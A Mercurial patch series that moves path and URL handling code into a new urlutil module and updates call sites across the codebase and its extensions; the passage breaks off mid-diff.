b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -1842,6 +1842,9 @@ my_server = https://example.com/my_path my_server:pushurl = ssh://example.com/my_path + Paths using the 'path://otherpath' scheme will inherit the sub-options + value from the path they point to. + The following sub-options can be defined: "pushurl" # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618178075 -7200 # Sun Apr 11 23:54:35 2021 +0200 # Node ID 33524c46a092315ba76da3763f70b532e49bc8cd # Parent 95a5ed7db9cabe52bcf84599e017ec1bed63a290 urlutil: extract `path` related code into a new module They are a lot of code related to url and path handling scattering into various large module. To consolidate the code before doing more change (for defining "multi-path"), we gather it together. Differential Revision: https://phab.mercurial-scm.org/D10373 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -26,7 +26,6 @@ from .pycompat import ( getattr, open, - setattr, ) from . import ( @@ -48,6 +47,7 @@ procutil, resourceutil, stringutil, + urlutil, ) urlreq = util.urlreq @@ -1049,7 +1049,7 @@ @util.propertycache def paths(self): - return paths(self) + return urlutil.paths(self) def getpath(self, *args, **kwargs): """see paths.getpath for details @@ -2180,237 +2180,6 @@ return util._estimatememory() -class paths(dict): - """Represents a collection of paths and their configs. - - Data is initially derived from ui instances and the config files they have - loaded. - """ - - def __init__(self, ui): - dict.__init__(self) - - for name, loc in ui.configitems(b'paths', ignoresub=True): - # No location is the same as not existing. - if not loc: - continue - loc, sub_opts = ui.configsuboptions(b'paths', name) - self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) - - for name, p in sorted(self.items()): - p.chain_path(ui, self) - - def getpath(self, ui, name, default=None): - """Return a ``path`` from a string, falling back to default. - - ``name`` can be a named path or locations. Locations are filesystem - paths or URIs. - - Returns None if ``name`` is not a registered path, a URI, or a local - path to a repo. - """ - # Only fall back to default if no path was requested. - if name is None: - if not default: - default = () - elif not isinstance(default, (tuple, list)): - default = (default,) - for k in default: - try: - return self[k] - except KeyError: - continue - return None - - # Most likely empty string. - # This may need to raise in the future. - if not name: - return None - - try: - return self[name] - except KeyError: - # Try to resolve as a local path or URI. - try: - # we pass the ui instance are warning might need to be issued - return path(ui, None, rawloc=name) - except ValueError: - raise error.RepoError(_(b'repository %s does not exist') % name) - - -_pathsuboptions = {} - - -def pathsuboption(option, attr): - """Decorator used to declare a path sub-option. - - Arguments are the sub-option name and the attribute it should set on - ``path`` instances. - - The decorated function will receive as arguments a ``ui`` instance, - ``path`` instance, and the string value of this option from the config. - The function should return the value that will be set on the ``path`` - instance. - - This decorator can be used to perform additional verification of - sub-options and to change the type of sub-options. - """ - - def register(func): - _pathsuboptions[option] = (attr, func) - return func - - return register - - -@pathsuboption(b'pushurl', b'pushloc') -def pushurlpathoption(ui, path, value): - u = util.url(value) - # Actually require a URL. - if not u.scheme: - ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) - return None - - # Don't support the #foo syntax in the push URL to declare branch to - # push. - if u.fragment: - ui.warn( - _( - b'("#fragment" in paths.%s:pushurl not supported; ' - b'ignoring)\n' - ) - % path.name - ) - u.fragment = None - - return bytes(u) - - -@pathsuboption(b'pushrev', b'pushrev') -def pushrevpathoption(ui, path, value): - return value - - -class path(object): - """Represents an individual path and its configuration.""" - - def __init__(self, ui, name, rawloc=None, suboptions=None): - """Construct a path from its config options. - - ``ui`` is the ``ui`` instance the path is coming from. - ``name`` is the symbolic name of the path. - ``rawloc`` is the raw location, as defined in the config. - ``pushloc`` is the raw locations pushes should be made to. - - If ``name`` is not defined, we require that the location be a) a local - filesystem path with a .hg directory or b) a URL. If not, - ``ValueError`` is raised. - """ - if not rawloc: - raise ValueError(b'rawloc must be defined') - - # Locations may define branches via syntax <base>#<branch>. - u = util.url(rawloc) - branch = None - if u.fragment: - branch = u.fragment - u.fragment = None - - self.url = u - # the url from the config/command line before dealing with `path://` - self.raw_url = u.copy() - self.branch = branch - - self.name = name - self.rawloc = rawloc - self.loc = b'%s' % u - - self._validate_path() - - _path, sub_opts = ui.configsuboptions(b'paths', b'*') - self._own_sub_opts = {} - if suboptions is not None: - self._own_sub_opts = suboptions.copy() - sub_opts.update(suboptions) - self._all_sub_opts = sub_opts.copy() - - self._apply_suboptions(ui, sub_opts) - - def chain_path(self, ui, paths): - if self.url.scheme == b'path': - assert self.url.path is None - try: - subpath = paths[self.url.host] - except KeyError: - m = _('cannot use `%s`, "%s" is not a known path') - m %= (self.rawloc, self.url.host) - raise error.Abort(m) - if subpath.raw_url.scheme == b'path': - m = _('cannot use `%s`, "%s" is also define as a `path://`') - m %= (self.rawloc, self.url.host) - raise error.Abort(m) - self.url = subpath.url - self.rawloc = subpath.rawloc - self.loc = subpath.loc - if self.branch is None: - self.branch = subpath.branch - else: - base = self.rawloc.rsplit(b'#', 1)[0] - self.rawloc = b'%s#%s' % (base, self.branch) - suboptions = subpath._all_sub_opts.copy() - suboptions.update(self._own_sub_opts) - self._apply_suboptions(ui, suboptions) - - def _validate_path(self): - # When given a raw location but not a symbolic name, validate the - # location is valid. - if ( - not self.name - and not self.url.scheme - and not self._isvalidlocalpath(self.loc) - ): - raise ValueError( - b'location is not a URL or path to a local ' - b'repo: %s' % self.rawloc - ) - - def _apply_suboptions(self, ui, sub_options): - # Now process the sub-options. If a sub-option is registered, its - # attribute will always be present. The value will be None if there - # was no valid sub-option. - for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): - if suboption not in sub_options: - setattr(self, attr, None) - continue - - value = func(ui, self, sub_options[suboption]) - setattr(self, attr, value) - - def _isvalidlocalpath(self, path): - """Returns True if the given path is a potentially valid repository. - This is its own function so that extensions can change the definition of - 'valid' in this case (like when pulling from a git repo into a hg - one).""" - try: - return os.path.isdir(os.path.join(path, b'.hg')) - # Python 2 may return TypeError. Python 3, ValueError. - except (TypeError, ValueError): - return False - - @property - def suboptions(self): - """Return sub-options and their values for this path. - - This is intended to be used for presentation purposes. - """ - d = {} - for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions): - value = getattr(self, attr) - if value is not None: - d[subopt] = value - return d - - # we instantiate one globally shared progress bar to avoid # competing progress bars when multiple UI objects get created _progresssingleton = None diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py new file mode 100644 --- /dev/null +++ b/mercurial/utils/urlutil.py @@ -0,0 +1,249 @@ +# utils.urlutil - code related to [paths] management +# +# Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others +# +# This software may be used and distributed according to the terms of the +# GNU General Public License version 2 or any later version. +import os + +from ..i18n import _ +from ..pycompat import ( + getattr, + setattr, +) +from .. import ( + error, + pycompat, + util, +) + + +class paths(dict): + """Represents a collection of paths and their configs. + + Data is initially derived from ui instances and the config files they have + loaded. + """ + + def __init__(self, ui): + dict.__init__(self) + + for name, loc in ui.configitems(b'paths', ignoresub=True): + # No location is the same as not existing. + if not loc: + continue + loc, sub_opts = ui.configsuboptions(b'paths', name) + self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) + + for name, p in sorted(self.items()): + p.chain_path(ui, self) + + def getpath(self, ui, name, default=None): + """Return a ``path`` from a string, falling back to default. + + ``name`` can be a named path or locations. Locations are filesystem + paths or URIs. + + Returns None if ``name`` is not a registered path, a URI, or a local + path to a repo. + """ + # Only fall back to default if no path was requested. + if name is None: + if not default: + default = () + elif not isinstance(default, (tuple, list)): + default = (default,) + for k in default: + try: + return self[k] + except KeyError: + continue + return None + + # Most likely empty string. + # This may need to raise in the future. + if not name: + return None + + try: + return self[name] + except KeyError: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + return path(ui, None, rawloc=name) + except ValueError: + raise error.RepoError(_(b'repository %s does not exist') % name) + + +_pathsuboptions = {} + + +def pathsuboption(option, attr): + """Decorator used to declare a path sub-option. + + Arguments are the sub-option name and the attribute it should set on + ``path`` instances. + + The decorated function will receive as arguments a ``ui`` instance, + ``path`` instance, and the string value of this option from the config. + The function should return the value that will be set on the ``path`` + instance. + + This decorator can be used to perform additional verification of + sub-options and to change the type of sub-options. + """ + + def register(func): + _pathsuboptions[option] = (attr, func) + return func + + return register + + +@pathsuboption(b'pushurl', b'pushloc') +def pushurlpathoption(ui, path, value): + u = util.url(value) + # Actually require a URL. + if not u.scheme: + ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) + return None + + # Don't support the #foo syntax in the push URL to declare branch to + # push. + if u.fragment: + ui.warn( + _( + b'("#fragment" in paths.%s:pushurl not supported; ' + b'ignoring)\n' + ) + % path.name + ) + u.fragment = None + + return bytes(u) + + +@pathsuboption(b'pushrev', b'pushrev') +def pushrevpathoption(ui, path, value): + return value + + +class path(object): + """Represents an individual path and its configuration.""" + + def __init__(self, ui, name, rawloc=None, suboptions=None): + """Construct a path from its config options. + + ``ui`` is the ``ui`` instance the path is coming from. + ``name`` is the symbolic name of the path. + ``rawloc`` is the raw location, as defined in the config. + ``pushloc`` is the raw locations pushes should be made to. + + If ``name`` is not defined, we require that the location be a) a local + filesystem path with a .hg directory or b) a URL. If not, + ``ValueError`` is raised. + """ + if not rawloc: + raise ValueError(b'rawloc must be defined') + + # Locations may define branches via syntax <base>#<branch>. + u = util.url(rawloc) + branch = None + if u.fragment: + branch = u.fragment + u.fragment = None + + self.url = u + # the url from the config/command line before dealing with `path://` + self.raw_url = u.copy() + self.branch = branch + + self.name = name + self.rawloc = rawloc + self.loc = b'%s' % u + + self._validate_path() + + _path, sub_opts = ui.configsuboptions(b'paths', b'*') + self._own_sub_opts = {} + if suboptions is not None: + self._own_sub_opts = suboptions.copy() + sub_opts.update(suboptions) + self._all_sub_opts = sub_opts.copy() + + self._apply_suboptions(ui, sub_opts) + + def chain_path(self, ui, paths): + if self.url.scheme == b'path': + assert self.url.path is None + try: + subpath = paths[self.url.host] + except KeyError: + m = _('cannot use `%s`, "%s" is not a known path') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) + if subpath.raw_url.scheme == b'path': + m = _('cannot use `%s`, "%s" is also define as a `path://`') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) + self.url = subpath.url + self.rawloc = subpath.rawloc + self.loc = subpath.loc + if self.branch is None: + self.branch = subpath.branch + else: + base = self.rawloc.rsplit(b'#', 1)[0] + self.rawloc = b'%s#%s' % (base, self.branch) + suboptions = subpath._all_sub_opts.copy() + suboptions.update(self._own_sub_opts) + self._apply_suboptions(ui, suboptions) + + def _validate_path(self): + # When given a raw location but not a symbolic name, validate the + # location is valid. + if ( + not self.name + and not self.url.scheme + and not self._isvalidlocalpath(self.loc) + ): + raise ValueError( + b'location is not a URL or path to a local ' + b'repo: %s' % self.rawloc + ) + + def _apply_suboptions(self, ui, sub_options): + # Now process the sub-options. If a sub-option is registered, its + # attribute will always be present. The value will be None if there + # was no valid sub-option. + for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): + if suboption not in sub_options: + setattr(self, attr, None) + continue + + value = func(ui, self, sub_options[suboption]) + setattr(self, attr, value) + + def _isvalidlocalpath(self, path): + """Returns True if the given path is a potentially valid repository. + This is its own function so that extensions can change the definition of + 'valid' in this case (like when pulling from a git repo into a hg + one).""" + try: + return os.path.isdir(os.path.join(path, b'.hg')) + # Python 2 may return TypeError. Python 3, ValueError. + except (TypeError, ValueError): + return False + + @property + def suboptions(self): + """Return sub-options and their values for this path. + + This is intended to be used for presentation purposes. + """ + d = {} + for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions): + value = getattr(self, attr) + if value is not None: + d[subopt] = value + return d # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618189264 -7200 # Mon Apr 12 03:01:04 2021 +0200 # Node ID ffd3e823a7e543d20c00799a71a75f820e4702d8 # Parent 33524c46a092315ba76da3763f70b532e49bc8cd urlutil: extract `url` related code from `util` into the new module The new module is well fitting for this new code. And this will be useful to make the gathered code collaborate more later. Differential Revision: https://phab.mercurial-scm.org/D10374 diff --git a/hgext/fetch.py b/hgext/fetch.py --- a/hgext/fetch.py +++ b/hgext/fetch.py @@ -19,9 +19,11 @@ lock, pycompat, registrar, - util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) release = lock.release cmdtable = {} @@ -109,7 +111,8 @@ other = hg.peer(repo, opts, ui.expandpath(source)) ui.status( - _(b'pulling from %s\n') % util.hidepassword(ui.expandpath(source)) + _(b'pulling from %s\n') + % urlutil.hidepassword(ui.expandpath(source)) ) revs = None if opts[b'rev']: @@ -180,7 +183,7 @@ if not err: # we don't translate commit messages message = cmdutil.logmessage(ui, opts) or ( - b'Automated merge with %s' % util.removeauth(other.url()) + b'Automated merge with %s' % urlutil.removeauth(other.url()) ) editopt = opts.get(b'edit') or opts.get(b'force_editor') editor = cmdutil.getcommiteditor(edit=editopt, editform=b'fetch') diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -242,6 +242,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) pickle = util.pickle @@ -1042,7 +1043,7 @@ opts = {} dest = ui.expandpath(remote or b'default-push', remote or b'default') dest, branches = hg.parseurl(dest, None)[:2] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) revs, checkout = hg.addbranchrevs(repo, repo, branches, None) other = hg.peer(repo, opts, dest) diff --git a/hgext/largefiles/basestore.py b/hgext/largefiles/basestore.py --- a/hgext/largefiles/basestore.py +++ b/hgext/largefiles/basestore.py @@ -12,6 +12,9 @@ from mercurial.i18n import _ from mercurial import node, util +from mercurial.utils import ( + urlutil, +) from . import lfutil @@ -29,13 +32,13 @@ def longmessage(self): return _(b"error getting id %s from url %s for file %s: %s\n") % ( self.hash, - util.hidepassword(self.url), + urlutil.hidepassword(self.url), self.filename, self.detail, ) def __str__(self): - return b"%s: %s" % (util.hidepassword(self.url), self.detail) + return b"%s: %s" % (urlutil.hidepassword(self.url), self.detail) class basestore(object): @@ -79,7 +82,7 @@ if not available.get(hash): ui.warn( _(b'%s: largefile %s not available from %s\n') - % (filename, hash, util.hidepassword(self.url)) + % (filename, hash, urlutil.hidepassword(self.url)) ) missing.append(filename) continue diff --git a/hgext/largefiles/remotestore.py b/hgext/largefiles/remotestore.py --- a/hgext/largefiles/remotestore.py +++ b/hgext/largefiles/remotestore.py @@ -15,7 +15,10 @@ util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from . import ( basestore, @@ -40,11 +43,11 @@ if self.sendfile(source, hash): raise error.Abort( _(b'remotestore: could not put %s to remote store %s') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) self.ui.debug( _(b'remotestore: put %s to remote store %s\n') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) def exists(self, hashes): @@ -80,7 +83,7 @@ # keep trying with the other files... they will probably # all fail too. raise error.Abort( - b'%s: %s' % (util.hidepassword(self.url), e.reason) + b'%s: %s' % (urlutil.hidepassword(self.url), e.reason) ) except IOError as e: raise basestore.StoreError( diff --git a/hgext/largefiles/storefactory.py b/hgext/largefiles/storefactory.py --- a/hgext/largefiles/storefactory.py +++ b/hgext/largefiles/storefactory.py @@ -12,6 +12,9 @@ hg, util, ) +from mercurial.utils import ( + urlutil, +) from . import ( lfutil, @@ -71,7 +74,7 @@ raise error.Abort( _(b'%s does not appear to be a largefile store') - % util.hidepassword(path) + % urlutil.hidepassword(path) ) diff --git a/hgext/lfs/blobstore.py b/hgext/lfs/blobstore.py --- a/hgext/lfs/blobstore.py +++ b/hgext/lfs/blobstore.py @@ -31,7 +31,10 @@ worker, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from ..largefiles import lfutil @@ -725,7 +728,7 @@ https://github.com/git-lfs/git-lfs/blob/master/docs/api/server-discovery.md """ lfsurl = repo.ui.config(b'lfs', b'url') - url = util.url(lfsurl or b'') + url = urlutil.url(lfsurl or b'') if lfsurl is None: if remote: path = remote @@ -739,7 +742,7 @@ # and fall back to inferring from 'paths.remote' if unspecified. path = repo.ui.config(b'paths', b'default') or b'' - defaulturl = util.url(path) + defaulturl = urlutil.url(path) # TODO: support local paths as well. # TODO: consider the ssh -> https transformation that git applies @@ -748,7 +751,7 @@ defaulturl.path += b'/' defaulturl.path = (defaulturl.path or b'') + b'.git/info/lfs' - url = util.url(bytes(defaulturl)) + url = urlutil.url(bytes(defaulturl)) repo.ui.note(_(b'lfs: assuming remote store: %s\n') % url) scheme = url.scheme diff --git a/hgext/mq.py b/hgext/mq.py --- a/hgext/mq.py +++ b/hgext/mq.py @@ -108,6 +108,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) release = lockmod.release @@ -2509,7 +2510,7 @@ ) filename = normname(filename) self.checkreservedname(filename) - if util.url(filename).islocal(): + if urlutil.url(filename).islocal(): originpath = self.join(filename) if not os.path.isfile(originpath): raise error.Abort( diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -36,6 +36,9 @@ util, wireprototypes, ) +from mercurial.utils import ( + urlutil, +) table = {} command = registrar.command(table) @@ -592,7 +595,7 @@ # also define the set of revisions to update for widening. remotepath = ui.expandpath(remotepath or b'default') url, branches = hg.parseurl(remotepath) - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) remote = hg.peer(repo, opts, url) try: diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -99,7 +99,10 @@ templater, util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) stringio = util.stringio @@ -529,7 +532,7 @@ ui = repo.ui url = ui.expandpath(dest or b'default-push', dest or b'default') url = hg.parseurl(url)[0] - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) revs = [r for r in revs if r >= 0] if not revs: diff --git a/hgext/phabricator.py b/hgext/phabricator.py --- a/hgext/phabricator.py +++ b/hgext/phabricator.py @@ -103,6 +103,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) from . import show @@ -366,7 +367,7 @@ process(k, v) process(b'', params) - return util.urlreq.urlencode(flatparams) + return urlutil.urlreq.urlencode(flatparams) def readurltoken(ui): @@ -381,7 +382,7 @@ _(b'config %s.%s is required') % (b'phabricator', b'url') ) - res = httpconnectionmod.readauthforuri(ui, url, util.url(url).user) + res = httpconnectionmod.readauthforuri(ui, url, urlutil.url(url).user) token = None if res: diff --git a/hgext/schemes.py b/hgext/schemes.py --- a/hgext/schemes.py +++ b/hgext/schemes.py @@ -52,7 +52,9 @@ pycompat, registrar, templater, - util, +) +from mercurial.utils import ( + urlutil, ) cmdtable = {} @@ -86,7 +88,7 @@ ) def resolve(self, url): - # Should this use the util.url class, or is manual parsing better? + # Should this use the urlutil.url class, or is manual parsing better? try: url = url.split(b'://', 1)[1] except IndexError: @@ -137,7 +139,7 @@ ) hg.schemes[scheme] = ShortRepository(url, scheme, t) - extensions.wrapfunction(util, b'hasdriveletter', hasdriveletter) + extensions.wrapfunction(urlutil, b'hasdriveletter', hasdriveletter) @command(b'debugexpandscheme', norepo=True) diff --git a/mercurial/bookmarks.py b/mercurial/bookmarks.py --- a/mercurial/bookmarks.py +++ b/mercurial/bookmarks.py @@ -27,6 +27,9 @@ txnutil, util, ) +from .utils import ( + urlutil, +) # label constants # until 3.5, bookmarks.current was the advertised name, not @@ -597,10 +600,10 @@ # try to use an @pathalias suffix # if an @pathalias already exists, we overwrite (update) it if path.startswith(b"file:"): - path = util.url(path).path + path = urlutil.url(path).path for p, u in ui.configitems(b"paths"): if u.startswith(b"file:"): - u = util.url(u).path + u = urlutil.url(u).path if path == u: return b'%s@%s' % (b, p) diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -177,7 +177,10 @@ url, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -2073,7 +2076,7 @@ raw_url = inpart.params[b'url'] except KeyError: raise error.Abort(_(b'remote-changegroup: missing "%s" param') % b'url') - parsed_url = util.url(raw_url) + parsed_url = urlutil.url(raw_url) if parsed_url.scheme not in capabilities[b'remote-changegroup']: raise error.Abort( _(b'remote-changegroup does not support %s urls') @@ -2110,7 +2113,7 @@ cg = exchange.readbundle(op.repo.ui, real_part, raw_url) if not isinstance(cg, changegroup.cg1unpacker): raise error.Abort( - _(b'%s: not a bundle version 1.0') % util.hidepassword(raw_url) + _(b'%s: not a bundle version 1.0') % urlutil.hidepassword(raw_url) ) ret = _processchangegroup(op, cg, tr, op.source, b'bundle2') if op.reply is not None: @@ -2126,7 +2129,7 @@ except error.Abort as e: raise error.Abort( _(b'bundle at %s is corrupted:\n%s') - % (util.hidepassword(raw_url), e.message) + % (urlutil.hidepassword(raw_url), e.message) ) assert not inpart.read() diff --git a/mercurial/bundlerepo.py b/mercurial/bundlerepo.py --- a/mercurial/bundlerepo.py +++ b/mercurial/bundlerepo.py @@ -43,6 +43,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) class bundlerevlog(revlog.revlog): @@ -475,7 +478,7 @@ cwd = pathutil.normasprefix(cwd) if parentpath.startswith(cwd): parentpath = parentpath[len(cwd) :] - u = util.url(path) + u = urlutil.url(path) path = u.localpath() if u.scheme == b'bundle': s = path.split(b"+", 1) diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -74,6 +74,7 @@ from .utils import ( dateutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -4319,7 +4320,7 @@ ui.warn(_(b"remote doesn't support bookmarks\n")) return 0 ui.pager(b'incoming') - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) return bookmarks.incoming(ui, repo, other) finally: other.close() @@ -4994,7 +4995,7 @@ if b'bookmarks' not in other.listkeys(b'namespaces'): ui.warn(_(b"remote doesn't support bookmarks\n")) return 0 - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) ui.pager(b'outgoing') return bookmarks.outgoing(ui, repo, other) finally: @@ -5142,7 +5143,7 @@ fm = ui.formatter(b'paths', opts) if fm.isplain(): - hidepassword = util.hidepassword + hidepassword = urlutil.hidepassword else: hidepassword = bytes if ui.quiet: @@ -5392,7 +5393,7 @@ source, branches = hg.parseurl( ui.expandpath(source), opts.get(b'branch') ) - ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) + ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source)) ui.flush() other = hg.peer(repo, opts, source) update_conflict = None @@ -5732,7 +5733,7 @@ ) dest = path.pushloc or path.loc branches = (path.branch, opts.get(b'branch') or []) - ui.status(_(b'pushing to %s\n') % util.hidepassword(dest)) + ui.status(_(b'pushing to %s\n') % urlutil.hidepassword(dest)) revs, checkout = hg.addbranchrevs( repo, repo, branches, opts.get(b'rev') ) @@ -7235,7 +7236,7 @@ revs, checkout = hg.addbranchrevs(repo, other, branches, None) if revs: revs = [other.lookup(rev) for rev in revs] - ui.debug(b'comparing with %s\n' % util.hidepassword(source)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(source)) repo.ui.pushbuffer() commoninc = discovery.findcommonincoming(repo, other, heads=revs) repo.ui.popbuffer() @@ -7257,7 +7258,7 @@ if opts.get(b'remote'): raise return dest, dbranch, None, None - ui.debug(b'comparing with %s\n' % util.hidepassword(dest)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(dest)) elif sother is None: # there is no explicit destination peer, but source one is invalid return dest, dbranch, None, None @@ -7599,7 +7600,7 @@ try: txnname = b'unbundle' if not isinstance(gen, bundle2.unbundle20): - txnname = b'unbundle\n%s' % util.hidepassword(url) + txnname = b'unbundle\n%s' % urlutil.hidepassword(url) with repo.transaction(txnname) as tr: op = bundle2.applybundle( repo, gen, tr, source=b'unbundle', url=url diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -98,6 +98,7 @@ dateutil, procutil, stringutil, + urlutil, ) from .revlogutils import ( @@ -1061,7 +1062,7 @@ remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) remote = hg.peer(repo, opts, remoteurl) - ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl)) else: branches = (None, []) remote_filtered_revs = scmutil.revrange( @@ -3652,7 +3653,7 @@ source = b"default" source, branches = hg.parseurl(ui.expandpath(source)) - url = util.url(source) + url = urlutil.url(source) defaultport = {b'https': 443, b'ssh': 22} if url.scheme in defaultport: @@ -4525,7 +4526,7 @@ # We bypass hg.peer() so we can proxy the sockets. # TODO consider not doing this because we skip # ``hg.wirepeersetupfuncs`` and potentially other useful functionality. - u = util.url(path) + u = urlutil.url(path) if u.scheme != b'http': raise error.Abort(_(b'only http:// paths are currently supported')) diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -42,6 +42,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) urlerr = util.urlerr @@ -1465,7 +1466,7 @@ def transaction(self): """Return an open transaction object, constructing if necessary""" if not self._tr: - trname = b'%s\n%s' % (self.source, util.hidepassword(self.url)) + trname = b'%s\n%s' % (self.source, urlutil.hidepassword(self.url)) self._tr = self.repo.transaction(trname) self._tr.hookargs[b'source'] = self.source self._tr.hookargs[b'url'] = self.url @@ -2647,7 +2648,7 @@ # push can proceed if not isinstance(cg, bundle2.unbundle20): # legacy case: bundle1 (changegroup 01) - txnname = b"\n".join([source, util.hidepassword(url)]) + txnname = b"\n".join([source, urlutil.hidepassword(url)]) with repo.lock(), repo.transaction(txnname) as tr: op = bundle2.applybundle(repo, cg, tr, source, url) r = bundle2.combinechangegroupresults(op) diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -55,6 +55,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) @@ -65,7 +66,7 @@ def _local(path): - path = util.expandpath(util.urllocalpath(path)) + path = util.expandpath(urlutil.urllocalpath(path)) try: # we use os.stat() directly here instead of os.path.isfile() @@ -132,7 +133,7 @@ def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' - u = util.url(path) + u = urlutil.url(path) branch = None if u.fragment: branch = u.fragment @@ -152,7 +153,7 @@ def _peerlookup(path): - u = util.url(path) + u = urlutil.url(path) scheme = u.scheme or b'file' thing = schemes.get(scheme) or schemes[b'file'] try: @@ -177,7 +178,7 @@ def openpath(ui, path, sendaccept=True): '''open path with open if local, url.open if remote''' - pathurl = util.url(path, parsequery=False, parsefragment=False) + pathurl = urlutil.url(path, parsequery=False, parsefragment=False) if pathurl.islocal(): return util.posixfile(pathurl.localpath(), b'rb') else: @@ -265,7 +266,7 @@ >>> defaultdest(b'http://example.org/foo/') 'foo' """ - path = util.url(source).path + path = urlutil.url(source).path if not path: return b'' return os.path.basename(os.path.normpath(path)) @@ -571,7 +572,7 @@ # Resolve the value to put in [paths] section for the source. if islocal(source): - defaultpath = os.path.abspath(util.urllocalpath(source)) + defaultpath = os.path.abspath(urlutil.urllocalpath(source)) else: defaultpath = source @@ -693,8 +694,8 @@ else: dest = ui.expandpath(dest) - dest = util.urllocalpath(dest) - source = util.urllocalpath(source) + dest = urlutil.urllocalpath(dest) + source = urlutil.urllocalpath(source) if not dest: raise error.InputError(_(b"empty destination path is not valid")) @@ -825,7 +826,7 @@ abspath = origsource if islocal(origsource): - abspath = os.path.abspath(util.urllocalpath(origsource)) + abspath = os.path.abspath(urlutil.urllocalpath(origsource)) if islocal(dest): cleandir = dest @@ -939,7 +940,7 @@ local.setnarrowpats(storeincludepats, storeexcludepats) narrowspec.copytoworkingcopy(local) - u = util.url(abspath) + u = urlutil.url(abspath) defaulturl = bytes(u) local.ui.setconfig(b'paths', b'default', defaulturl, b'clone') if not stream: @@ -986,7 +987,7 @@ destrepo = destpeer.local() if destrepo: template = uimod.samplehgrcs[b'cloned'] - u = util.url(abspath) + u = urlutil.url(abspath) u.passwd = None defaulturl = bytes(u) destrepo.vfs.write(b'hgrc', util.tonativeeol(template % defaulturl)) @@ -1269,7 +1270,7 @@ other = peer(repo, opts, source) cleanupfn = other.close try: - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) if revs: @@ -1330,7 +1331,7 @@ dest = path.pushloc or path.loc branches = path.branch, opts.get(b'branch') or [] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) if revs: revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] diff --git a/mercurial/hgweb/request.py b/mercurial/hgweb/request.py --- a/mercurial/hgweb/request.py +++ b/mercurial/hgweb/request.py @@ -17,6 +17,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) class multidict(object): @@ -184,7 +187,7 @@ reponame = env.get(b'REPO_NAME') if altbaseurl: - altbaseurl = 